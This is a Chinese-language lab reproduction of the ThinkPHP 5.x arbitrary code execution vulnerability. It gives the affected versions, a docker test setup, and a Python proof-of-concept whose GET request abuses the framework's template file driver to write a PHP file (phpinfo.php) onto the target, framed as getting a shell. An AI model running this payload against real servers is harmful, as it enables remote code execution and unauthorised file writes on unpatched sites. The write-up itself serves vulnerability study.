ThinkPHP任意代码执行漏洞复现
一、漏洞描述
由于 ThinkPHP 框架对控制器名没有进行足够严格的检测,导致在没有开启强制路由的情况下,攻击者可以在服务端执行任意恶意代码。
经过本地复现确认,攻击者仅仅通过一个 HTTP GET 请求,就可以完成漏洞的利用,执行任意代码。以执行 phpinfo() 为例。
二、影响范围
ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31
三、漏洞复现
利用docker搭建好环境启动
访问192.168.1.93:8181
构造poc:
#!/usr/bin/env python
#coding:utf-8
import sys
import requests
def tpgetshell(url):
headers={
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36",
}
r = requests.get(url=url,headers=headers)
print ("phpinfo写入成功")
print ("shell url:"+sys.argv[1] + "/phpinfo.php")
if __name__ == '__main__':
if len(sys.argv) != 2:
print ("python http://www.xxx.com/")
else:
poc = "/?s=index/\\think\\template\\driver\\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E"
url = sys.argv[1] + poc
tpgetshell(url)
测试: